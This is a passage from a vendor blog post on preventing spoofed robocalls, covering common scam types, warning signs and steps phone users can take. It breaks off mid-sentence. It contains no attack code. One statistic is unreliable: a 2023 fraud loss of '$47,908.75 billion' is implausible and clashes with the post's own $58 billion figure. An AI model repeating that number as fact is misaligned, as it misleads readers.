{"id":2173,"date":"2021-06-16T07:22:42","date_gmt":"2021-06-16T07:22:42","guid":{"rendered":"https:\/\/www.revesoft.com\/blog\/?p=2173"},"modified":"2025-09-05T11:31:11","modified_gmt":"2025-09-05T11:31:11","slug":"prevent-spoofed-robocalls-stirshaken-role-sbc","status":"publish","type":"post","link":"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/","title":{"rendered":"How to Prevent Spoofing Calls? A Practical Prevention Guide"},"content":{"rendered":"<p><span style=\"font-weight: 400;\">Today, our phones are nothing less than our lifelines. However, the constant bombardment of spoofed calls is not just an annoyance, rather it is a dangerous phenomenon that\u2019s growing largely. <\/span><b><i>According to the statistics, &#8220;In the U.S. as of August 2023, Americans have received 5.46 billion robocalls and each person receives almost 17 spam calls each day.&#8221; <\/i><\/b><span style=\"font-weight: 400;\">These figures reveal that scammers are constantly inventing new ways to attack users via spoofed robocalls. But how to prevent spoofing calls?\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Remember what Benjamin Franklin\u00a0 once said, &#8220;An ounce of prevention is worth a pound of cure.&#8221; So, as the very first step, we must understand how spoofed robocalls happen, and different types of spoofing call scams, and of course, we will learn about some proven ways to prevent spoofing calls.\u00a0<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><\/p>\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_42 counter-hierarchy ez-toc-counter ez-toc-grey ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\">Table of Contents<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" area-label=\"ez-toc-toggle-icon-1\"><label for=\"item-691d4f91f34d1\" aria-label=\"Table of Content\"><span style=\"display: flex;align-items: center;width: 35px;height: 30px;justify-content: center;direction:ltr;\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/label><input  type=\"checkbox\" id=\"item-691d4f91f34d1\"><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 eztoc-visibility-hide-by-default' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#What_is_Phone_Spoofing\" title=\"What is Phone Spoofing?\">What is Phone Spoofing?<\/a><ul class='ez-toc-list-level-3'><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#How_Spoofing_Works\" title=\"How Spoofing Works?\">How Spoofing Works?<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#What_are_Spoofed_Robocalls\" title=\"What are Spoofed Robocalls?\">What are Spoofed Robocalls?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#Why_do_Phone_Companies_Allow_Spoofing\" title=\"Why do Phone Companies Allow Spoofing?\">Why do Phone Companies Allow Spoofing?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#Why_is_Phone_Spoofing_Dangerous\" title=\"Why is Phone Spoofing Dangerous?\">Why is Phone Spoofing Dangerous?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#7_Types_of_Phone_Spoofing_and_Robocall_Scams\" title=\"7 Types of Phone Spoofing and Robocall Scams\">7 Types of Phone Spoofing and Robocall Scams<\/a><ul class='ez-toc-list-level-3'><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#1_The_Tech_Support_Scam\" title=\"1. The \u201cTech Support\u201d Scam\">1. The \u201cTech Support\u201d Scam<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#2_The_Health_Insurance_Scam\" title=\"2. The \u201cHealth Insurance\u201d Scam\">2. The \u201cHealth Insurance\u201d Scam<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#3_The_Amazon_Account_Scam\" title=\"3. The \u201cAmazon Account\u201d Scam\">3. The \u201cAmazon Account\u201d Scam<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-10\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#4_The_Family_Emergency_Scam\" title=\"4. The \u201cFamily Emergency\u201d Scam\">4. The \u201cFamily Emergency\u201d Scam<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-11\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#5_The_Charity_Scam\" title=\"5. The \u201cCharity\u201d Scam\">5. The \u201cCharity\u201d Scam<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-12\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#6_The_Prize_Scam\" title=\"6. The \u201cPrize\u201d Scam\">6. The \u201cPrize\u201d Scam<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-13\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#7_The_IRS_Scam\" title=\"7. The \u201cIRS\u201d Scam\">7. The \u201cIRS\u201d Scam<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-14\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#How_to_Tell_if_Your_Phone_is_Spoofed_5_Red_Flags\" title=\"How to Tell if Your Phone is Spoofed ? 5 Red Flags\">How to Tell if Your Phone is Spoofed ? 5 Red Flags<\/a><ul class='ez-toc-list-level-3'><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-15\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#1_Non-familiar_Phone_Number\" title=\"1. Non-familiar Phone Number\">1. Non-familiar Phone Number<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-16\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#2_Pre-recorded_Voice_Messages\" title=\"2. Pre-recorded Voice Messages\">2. Pre-recorded Voice Messages<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-17\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#3_Need_for_Immediate_Action\" title=\"3. Need for Immediate Action\">3. Need for Immediate Action<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-18\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#4_Asks_for_Sensitive_Information\" title=\"4. Asks for Sensitive Information\">4. Asks for Sensitive Information<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-19\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#5_Display_Name_appears_Familiar_to_a_Known_Contact\" title=\"5. Display Name appears Familiar to a Known Contact\">5. Display Name appears Familiar to a Known Contact<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-20\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#How_to_Stop_Someone_from_Spoofing_Your_Phone_Immediate_Actions\" title=\"How to Stop Someone from Spoofing Your Phone? Immediate Actions\">How to Stop Someone from Spoofing Your Phone? Immediate Actions<\/a><ul class='ez-toc-list-level-3'><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-21\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#Report_Suspicious_Activities_to_Your_Carrier\" title=\"Report Suspicious Activities to Your Carrier\">Report Suspicious Activities to Your Carrier<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-22\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#Update_Your_Phone_Call_Security_Settings\" title=\"Update Your Phone Call Security Settings\">Update Your Phone Call Security Settings<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-23\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#Update_your_Voicemail_Password\" title=\"Update your Voicemail Password\">Update your Voicemail Password<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-24\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#Get_a_New_Phone_Number\" title=\"Get a New Phone Number\">Get a New Phone Number<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-25\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#How_to_Prevent_Spoofed_Calls_to_Your_Phone\" title=\"How to Prevent Spoofed Calls to Your Phone?\">How to Prevent Spoofed Calls to Your Phone?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-26\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#How_to_Block_Spoofed_Calls_on_Your_Device\" title=\"How to Block Spoofed Calls on Your Device?\">How to Block Spoofed Calls on Your Device?<\/a><ul class='ez-toc-list-level-3'><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-27\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#Block_Unknown_Numbers_on_iPhone\" title=\"Block Unknown Numbers on iPhone\">Block Unknown Numbers on iPhone<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-28\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#Block_Unknown_Numbers_on_Android\" title=\"Block Unknown Numbers on Android\">Block Unknown Numbers on Android<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-29\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#How_Can_Mobile_Carriers_Guard_Against_Spoofing\" title=\"How Can Mobile Carriers Guard Against Spoofing?\">How Can Mobile Carriers Guard Against Spoofing?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-30\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#Implementing_STIRSHAKEN_with_a_Session_Border_Controller\" title=\"Implementing STIR\/SHAKEN with a Session Border Controller\">Implementing STIR\/SHAKEN with a Session Border Controller<\/a><ul class='ez-toc-list-level-3'><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-31\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#What_is_STIRSHAKEN\" title=\"What is STIR\/SHAKEN?\">What is STIR\/SHAKEN?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-32\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#A_Common_Deployment_Architecture_for_SHAKEN\" title=\"A Common Deployment Architecture for SHAKEN\">A Common Deployment Architecture for SHAKEN<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-33\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#REVE_SBC_STIRSHAKEN_Combatting_Spoofed_Robocalls\" title=\"REVE SBC &amp; STIR\/SHAKEN: Combatting Spoofed Robocalls\">REVE SBC &amp; STIR\/SHAKEN: Combatting Spoofed Robocalls<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-34\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#Read_Also\" title=\"Read Also\">Read Also<\/a><ul class='ez-toc-list-level-3'><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-35\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#SIPVoIP_Fraud_Attacks_Why_Operators_Need_a_Reliable_Solution\" title=\"SIP\/VoIP Fraud Attacks: Why Operators Need a Reliable Solution?\">SIP\/VoIP Fraud Attacks: Why Operators Need a Reliable Solution?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-36\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/#Importance_of_a_Session_Border_Controller_in_SIP_Trunking\" title=\"Importance of a Session Border Controller in SIP Trunking\">Importance of a Session Border Controller in SIP Trunking<\/a><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<h2><span class=\"ez-toc-section\" id=\"What_is_Phone_Spoofing\"><\/span>What is Phone Spoofing?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><span style=\"font-weight: 400;\">Phone spoofing is a technique where a caller deliberately falsifies the information transmitted to your caller ID display to disguise their identity. With phone spoofing, the caller can display a different phone number or name on your phone&#8217;s caller ID. This is done to make it appear as if the call is coming from a different source than it is. Many robocallers use spoofing to trick subscribers into answering their mobile phones. When the caller ID is changed by the robocaller, the call recipient sees a familiar number, it is known as spoofing.\u00a0<\/span><\/p>\n<p><b><i>I will help you understand Phone Spoofing with this example.\u00a0<\/i><\/b><\/p>\n<p><i><span style=\"font-weight: 400;\">Alex is a corporate professional. One day, in the middle of an important project his phone rings. The call appears to be from a reputed bank where Alex holds one account. Upon answering, a recorded message informs Alex about a security breach in his account and urges him to \u201cpress 1\u201d to speak to a live agent. Taken aback by the urgency of the situation, Alex presses 1, and the polite voice on the other end claims to be an employee from the bank. Alex is being asked to share his Social Security Number and other banking details to verify his identity.\u00a0<\/span><\/i><\/p>\n<p><i><span style=\"font-weight: 400;\">Unknowingly, Alex shares his sensitive information, only to discover some unauthorized transactions in his bank account a few days later. Only then did he realize that he had fallen victim to a sophisticated phone spoofing attack.\u00a0<\/span><\/i><\/p>\n<p><span style=\"font-weight: 400;\">The crux of the above illustration is &#8211;<\/span><\/p>\n<blockquote><p><b><i>A Spoofed Call will look like it is from a reliable organization or a phone number that\u2019s similar to your subscriber. The main motive is to fetch the personal details like Bank or Credit Card information of the call recipient and indulge in cybercrime.<\/i><\/b><\/p><\/blockquote>\n<h3><span class=\"ez-toc-section\" id=\"How_Spoofing_Works\"><\/span>How Spoofing Works?<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">Phone Spoofing is accomplished by connecting the phone to a spoofing application. Such an application is software that replaces the original number of the caller with any other phone number using VoIP and PBX technology.\u00a0<\/span><\/p>\n<h2><span class=\"ez-toc-section\" id=\"What_are_Spoofed_Robocalls\"><\/span>What are Spoofed Robocalls?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><span style=\"font-weight: 400;\">Before going deep into how to prevent spoofing calls, let\u2019s understand what exactly is Robocall.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">A robocall is a phone call that delivers pre-recorded messages through an automated dialer. It\u2019s a common belief that robocalls are from telemarketers or even scammers, but they can also be used to deliver alerts and awareness. When Robocalls are combined with spoofing techniques, it becomes easier for scammers to get detected by the filtering systems. This makes it easy for the scammers to execute their fraudulent acts. Such attacks are also termed Caller ID Spoofing, Robocall Scams, Caller ID Fraud, Neighbor Spoofing, etc.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Robocalls are usually categorized in the following:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Telemarketing<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Scams<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Payment Reminders<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Alerts<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">However, not all of these are a cause of concern as users will not get impacted by alerts or reminders. Only the spam calls generated by spammers affect the most.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-4220 aligncenter\" src=\"https:\/\/www.revesoft.com\/blog\/wp-content\/uploads\/2021\/06\/robocall-stats.jpg\" alt=\"robocall stats\" width=\"866\" height=\"655\" \/><\/p>\n<blockquote><p><b><i>The <\/i><\/b><a href=\"https:\/\/www.juniperresearch.com\/researchstore\/operators-providers\/robocall-mitigation-market-research-report\"><b><i>latest report<\/i><\/b><\/a><b><i> from Juniper Research, the foremost experts assessing emerging communications technologies, has found that mobile subscribers will lose $58 billion to fraudulent robocalls globally in 2023; a rise from $53 billion in 2022. The report predicts that fraudsters\u2019 ability to innovate fraud methods will drive these losses to reach $70 billion globally by 2027. <\/i><\/b><a href=\"https:\/\/www.juniperresearch.com\/infographics\/robocall-mitigation-statistics\"><b><i>Source<\/i><\/b><\/a><\/p><\/blockquote>\n<h2><span class=\"ez-toc-section\" id=\"Why_do_Phone_Companies_Allow_Spoofing\"><\/span>Why do Phone Companies Allow Spoofing?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><span style=\"font-weight: 400;\">You need to understand that Spoofing is not always illegal. There are various valid use cases where spoofing is used by individuals and business organizations. Some scenarios are:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Law Enforcement agencies like police often use phone spoofing to mask their original phone numbers to stay covert during investigations.\u00a0<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Helpline services use phone spoofing to display a centralized phone number for outbound calls. This is done so that when customers call back, they dial the common number rather than the personal numbers of the agents.\u00a0<\/span><\/li>\n<\/ul>\n<p><i><span style=\"font-weight: 400;\">So when is Phone Spoofing Illegal? <\/span><\/i><span style=\"font-weight: 400;\">Phone spoofing is unlawful when it is carried out with a malicious or fraudulent purpose.\u00a0<\/span><\/p>\n<h2><span class=\"ez-toc-section\" id=\"Why_is_Phone_Spoofing_Dangerous\"><\/span>Why is Phone Spoofing Dangerous?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<blockquote><p><b><i>As of 2023, robocalls increased the rate of fraud-enhanced money loss resulting in $47,908.75 billion across the world.<\/i><\/b><\/p><\/blockquote>\n<p><span style=\"font-weight: 400;\">Phone Spoofing may not appear to be a serious threat, but it often leads to serious consequences. A scammer can execute a phone spoofing attack by pretending from a reputable organization. The scammer can manipulate the target to make them reveal their sensitive information. Such scams can easily turn out to be a thousand-dollar loss for the victims.\u00a0<\/span><\/p>\n<h2><span class=\"ez-toc-section\" id=\"7_Types_of_Phone_Spoofing_and_Robocall_Scams\"><\/span>7 Types of Phone Spoofing and Robocall Scams<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-4218 aligncenter\" src=\"https:\/\/www.revesoft.com\/blog\/wp-content\/uploads\/2021\/06\/top-robocall-categories.jpg\" alt=\"top robocall categories\" width=\"865\" height=\"378\" \/><\/p>\n<p><span style=\"font-weight: 400;\">Scammers have numerous tactics to manipulate targets and fulfill their goals. <\/span><b><i>The time of average robocall lasts for 45 seconds. <\/i><\/b><span style=\"font-weight: 400;\">Here are the top 7 phone spoofing and robocall attack methods used by scammers all around the world.<\/span><\/p>\n<h3><span class=\"ez-toc-section\" id=\"1_The_Tech_Support_Scam\"><\/span>1. The \u201cTech Support\u201d Scam<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">It\u2019s a very common type of phone spoofing attack. Here, the scammer pretends to be from a tech support company. The target is informed that there is some serious technical issue with their computer and the tech support team needs remote access to fix the issue. Once the access is provided, the scammer installs malware or steals sensitive information from the computer system.\u00a0<\/span><\/p>\n<h3><span class=\"ez-toc-section\" id=\"2_The_Health_Insurance_Scam\"><\/span>2. The \u201cHealth Insurance\u201d Scam<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">Here the caller pretends to be from a well-known health insurance company. The scammer will say that your insurance policy needs to be renewed immediately by updating personal details. Once the details are shared, they use the information to commit various types of fraud.\u00a0<\/span><\/p>\n<h3><span class=\"ez-toc-section\" id=\"3_The_Amazon_Account_Scam\"><\/span>3. The \u201cAmazon Account\u201d Scam<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">As the term suggests, in this type of scam the caller claims to be a representative from Amazon. The target is being told that there is some issue with their Amazon account and that they need to update their payment details. The motive behind these attacks is to fetch the credit card details from the target and use them for unauthorized transactions.\u00a0<\/span><\/p>\n<h3><span class=\"ez-toc-section\" id=\"4_The_Family_Emergency_Scam\"><\/span>4. The \u201cFamily Emergency\u201d Scam<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">Another common type of spoofing attack is where the caller pretends to be a family member, friend or loved one. The scammer will say that they are in serious trouble such as an accident and they need money immediately transferred to their account.\u00a0<\/span><\/p>\n<h3><span class=\"ez-toc-section\" id=\"5_The_Charity_Scam\"><\/span>5. The \u201cCharity\u201d Scam<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">This type of scam tricks the target in a bit different way. They will pretend to be from a charity organization and will show gratitude for a donation that you made in the past. However, this is just to trick you into donating again.\u00a0<\/span><\/p>\n<h3><span class=\"ez-toc-section\" id=\"6_The_Prize_Scam\"><\/span>6. The \u201cPrize\u201d Scam<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">In this type of scam, the caller informs the target that they have won a prize or a lottery in a lucky draw. The catch here is that the target needs to pay a certain amount of fee to get the prize.\u00a0<\/span><\/p>\n<h3><span class=\"ez-toc-section\" id=\"7_The_IRS_Scam\"><\/span>7. The \u201cIRS\u201d Scam<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">In this type of scam, the caller claims to be from a statuary body such as the IRS and informs the target that they owe money. Often, the scammer uses a threatening tone to cause panic in the target and asks for an instant money transfer otherwise they will take legal action.\u00a0<\/span><\/p>\n<h2><span class=\"ez-toc-section\" id=\"How_to_Tell_if_Your_Phone_is_Spoofed_5_Red_Flags\"><\/span>How to Tell if Your Phone is Spoofed ? 5 Red Flags<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><span style=\"font-weight: 400;\">Now you may wonder about how you can spot caller ID spoofing on your phone. Watch out for these 5 red flags:<\/span><\/p>\n<h3><span class=\"ez-toc-section\" id=\"1_Non-familiar_Phone_Number\"><\/span>1. Non-familiar Phone Number<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">When a call arrives on your phone, the name displayed by the caller ID seems to be familiar but the associated phone number appears to be unknown, then it might be a Spoofed call.\u00a0<\/span><\/p>\n<h3><span class=\"ez-toc-section\" id=\"2_Pre-recorded_Voice_Messages\"><\/span>2. Pre-recorded Voice Messages<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">When you answer a call, it plays a pre-recorded message that asks you to take an action by pressing a specific number for further instructions.\u00a0<\/span><\/p>\n<h3><span class=\"ez-toc-section\" id=\"3_Need_for_Immediate_Action\"><\/span>3. Need for Immediate Action<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">Creating a sense of urgency is a common tactic used in various types of attacks. In spoofed calls, the scammer impersonates someone familiar and demands immediate action, such as a transfer of money.\u00a0<\/span><\/p>\n<h3><span class=\"ez-toc-section\" id=\"4_Asks_for_Sensitive_Information\"><\/span>4. Asks for Sensitive Information<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">Spoofed calls often trick people into sharing their personal information such as their credit card information, net banking login credentials, etc. This information is used to blackmail the target or execute unauthorized transactions.\u00a0<\/span><\/p>\n<h3><span class=\"ez-toc-section\" id=\"5_Display_Name_appears_Familiar_to_a_Known_Contact\"><\/span>5. Display Name appears Familiar to a Known Contact<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">Suppose you have a friend \u2018Sara Smith\u2019 in your contacts and you receive a call from \u2018Sarah Smith\u2019. The display name is almost the same as your stored contact and maybe you might not be able to spot the difference at first glance.\u00a0<\/span><\/p>\n<h2><span class=\"ez-toc-section\" id=\"How_to_Stop_Someone_from_Spoofing_Your_Phone_Immediate_Actions\"><\/span>How to Stop Someone from Spoofing Your Phone? Immediate Actions<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><span style=\"font-weight: 400;\">Mobile Carriers often recommend certain guidelines that phone users can follow to stop spoofing attacks on their phones.\u00a0<\/span><\/p>\n<h3><span class=\"ez-toc-section\" id=\"Report_Suspicious_Activities_to_Your_Carrier\"><\/span>Report Suspicious Activities to Your Carrier<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">The majority of mobile carriers have dedicated support pages from where you can inform about any type of suspicious activities on your phone including calls.\u00a0<\/span><\/p>\n<h3><span class=\"ez-toc-section\" id=\"Update_Your_Phone_Call_Security_Settings\"><\/span>Update Your Phone Call Security Settings<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">Often we ignore to customize security settings on our phones and go with the default settings, which might not be correct. Whether you have an iPhone or Android, you can limit incoming calls only from your contacts using your phone\u2019s settings. This way you can stop scammers from using your phone number for spoofing.\u00a0<\/span><\/p>\n<h3><span class=\"ez-toc-section\" id=\"Update_your_Voicemail_Password\"><\/span>Update your Voicemail Password<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">If scammers are using your phone number for spoofing, they might also have access to your voicemail messages. So it is a good idea to set a password or security PIN for your voicemail or update the existing one to prevent unauthorized access.\u00a0<\/span><\/p>\n<h3><span class=\"ez-toc-section\" id=\"Get_a_New_Phone_Number\"><\/span>Get a New Phone Number<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">It\u2019s 